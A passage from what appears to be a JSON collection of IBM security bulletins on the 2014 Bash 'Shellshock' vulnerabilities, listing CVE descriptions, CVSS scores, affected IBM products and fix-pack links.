mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96209> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-7186](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96237> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-7187](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96238> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-6277](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96686> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-6278](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96687> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Starter Kit for Cloud 2.2.0. \n\nIBM SmartCloud Entry appliance versions 2.3.0, 2.4.0, 3.1.0, and 3.2.0.\n\n## Remediation/Fixes\n\nProduct\n\n| VRMF| APAR| Remediation/First Fix \n---|---|---|--- \nIBM Starter Kit for Cloud| 2.2.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+Starter+Kit+for+Cloud&function=fixid&fixids=2.2.0.1-IBM-SKC_APPL-FP001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+Starter+Kit+for+Cloud&function=fixid&fixids=2.2.0.1-IBM-SKC_APPL-FP001>) \nIBM SmartCloud Entry appliance| 2.3.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.3.0.1-IBM-SCE_APPL-FP001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.3.0.1-IBM-SCE_APPL-FP001>) \nIBM SmartCloud Entry appliance| 2.4.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.4.0.1-IBM-SCE_APPL-FP001](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=2.4.0.1-IBM-SCE_APPL-FP001>) \nIBM SmartCloud Entry appliance| 3.1.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.1.0.4-IBM-SCE_APPL-FP06](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.1.0.4-IBM-SCE_APPL-FP06>) \nIBM SmartCloud Entry appliance| 3.2.0| None| [http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.2.0.3-IBM-SCE_APPL-FP06](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Other+software/IBM+SmartCloud+Entry&function=fixid&fixids=3.2.0.3-IBM-SCE_APPL-FP06>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[Subscribe to Security Bulletins](<htttp://www.ibm.com/support/mynotifications>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n31 October 2014: Updated description, CVSS Base Score, and CVSS Vector for CVE-2014-7186 and CVE-2014-7187. \n2 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SST55W\",\"label\":\"IBM Cloud Manager with OpenStack\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.3;2.4;3.1;3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-19T00:49:12", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM SmartCloud Entry Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2020-07-19T00:49:12", "id": "0684E6CA4C2678854DD2AF881EFBA469B9153F9B25226D0E89F7A8E363B90191", "href": "https://www.ibm.com/support/pages/node/679549", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:10:56", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities affecting IBM Worklight Quality Assurance (WQA). \n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**Description**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/96153> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**Description**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**Description**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/96237> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**Description**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n[**CVE-ID**:_ __CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**Description**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/96686> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n[**CVE-ID**:_ __CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**Description**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/96687> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n## Affected Products and Versions\n\nIBM Worklight Quality Assurance 6.0\n\n## Remediation/Fixes\n\nInstall latest WQA fixpack using IBM Installation Manager or download and install [IBM Worklight Quality Assurance Fix Pack 1 (6.0.0.1) for 6.0](<http://www.ibm.com/support/docview.wss?uid=swg24038466>).\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n* 03 Oct 2014 : Original copy published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSFRDS\",\"label\":\"IBM MobileFirst Quality Assurance\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"General Information\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"6.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:47", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM Worklight Quality Assurance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-17T22:32:47", "id": "E9875BEF8E97815B76ED1D0FD7D59E5669EDACF80D617A93E84594F2257B2901", "href": "https://www.ibm.com/support/pages/node/252667", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T12:50:47", "description": "## Summary\n\nIBM System Networking Products are not vulnerable to the Bash vulnerabilities that have been referred to as \u0093Bash Bug\u0094 or \u0093Shellshock\u0094 and the two memory corruption vulnerabilities.\n\n## Vulnerability Details\n\n## Abstract\n\nIBM System Networking Products are not vulnerable to the Bash vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and the two memory corruption vulnerabilities.\n\n## Content\n\n * The following is a list of specific IBM System Networking products, all editions and all platforms are NOT vulnerable to the Bash vulnerabilities (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278). \n \n\n * IBM System Networking Management \n * IBM System Networking Switch Center\n * IBM System Networking Element Manager \n \n\n * IBM RackSwitch Products \n * IBM RackSwitch G7028\n * IBM RackSwitch G8000\n * IBM RackSwitch G8052\n * IBM RackSwitch G8124E\n * IBM RackSwitch G8124\n * IBM RackSwitch G8264\n * IBM RackSwitch G8264T\n * IBM RackSwitch G8264CS\n * IBM RackSwitch G8316\n * IBM RackSwitch G8332 \n \n\n * IBM BladeCenter Products \n * IBM BladeCenter Virtual Fabric 10Gb Switch Module\n * IBM BladeCenter iFlow Director\n * IBM BladeCenter 1/10Gb Uplink Ethernet Switch Module\n * IBM BladeCenter Layer 2/3 Gb Ethernet Switch Module\n * IBM BladeCenter Intelligent Copper Pass-Thru Module\n * IBM BladeCenter Server Connectivity Module\n * IBM BladeCenter Layer 2/7 Ethernet Switch Module \n \n\n * IBM Flex System Products \n * IBM\u00ae Flex System\u00ae Interconnect Fabric\n * IBM Flex System Fabric SI4093 System Interconnect Module\n * IBM Flex System Fabric EN4093R 10Gb Scalable Switch\n * IBM Flex System Fabric EN4093 10Gb Scalable Switch\n * IBM Flex System Fabric CN4093 10Gb Converged Scalable Switch\n * IBM Flex System EN2092 1Gb Ethernet Scalable Switch\n * IBM Flex System EN4091 10Gb Ethernet Pass-Thru Module\n\n## \n\n## Remediation:\n\nNo action required. \n\n\n**Change History** \nSeptember 26, 2014: Original Copy Published \n\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOn \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n## Operating System\n\nBladeCenter:Operating system independent / None\n\nSystem x Hardware Options:Operating system independent / None\n\nPureFlex System and Flex System:Operating system independent / None\n\nConverged switches:All operating systems listed\n\n[{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HW20M\",\"label\":\"BladeCenter->BladeCenter T Chassis\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HW20T\",\"label\":\"BladeCenter->BladeCenter E Chassis\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HW20U\",\"label\":\"System x Hardware Options->BladeCenter Switch Module\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Product\":{\"code\":\"HW21Y\",\"label\":\"BladeCenter H Chassis\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Product\":{\"code\":\"HW22P\",\"label\":\"BladeCenter S Chassis\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HW22Q\",\"label\":\"BladeCenter->BladeCenter HT Chassis\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HW24E\",\"label\":\"BladeCenter->BladeCenter S Express\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU050\",\"label\":\"BU NOT IDENTIFIED\"},\"Product\":{\"code\":\"HW949\",\"label\":\"PureFlex System and Flex System->Fabric Manager\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"LOB18\",\"label\":\"Miscellaneous LOB\"}},{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SG9VCJ\",\"label\":\"Power System G Series Rackswitch\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"LOB08\",\"label\":\"Cognitive Systems\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T12:30:43", "type": "ibm", "title": "Security Bulletin: IBM System Networking Products not affected by the Bash vulnerabilities (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2021-09-16T12:30:43", "id": "D765B0E424B32B58901509C0B37E90B68BD6A9A3ED95D1DE2E1DF2893F546155", "href": "https://www.ibm.com/support/pages/node/865310", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T21:57:47", "description": "## Vulnerability Details\n\n## Abstract\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \"Bash Bug\" or \"Shellshock\" and two memory corruption vulnerabilities. Bash is used by IBM Flex System FC5022 16Gb Fibre Channel SAN Switch.\n\n## Content\n\n**Vulnerability Details:**\n\n**CVE-ID:** [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>)\n\n**Description:** GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system.\n\nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96153> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n**CVE-ID:** [CVE-2014-7169](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>)\n\n**Description:** GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system.\n\nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96209> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n**CVE-ID:** [CVE-2014-7186](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>)\n\n**Description:** GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service.\n\nCVSS Base Score: 10 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96237> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n**CVE-ID:** [CVE-2014-7187](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>)\n\n**Description:** GNU Bash could 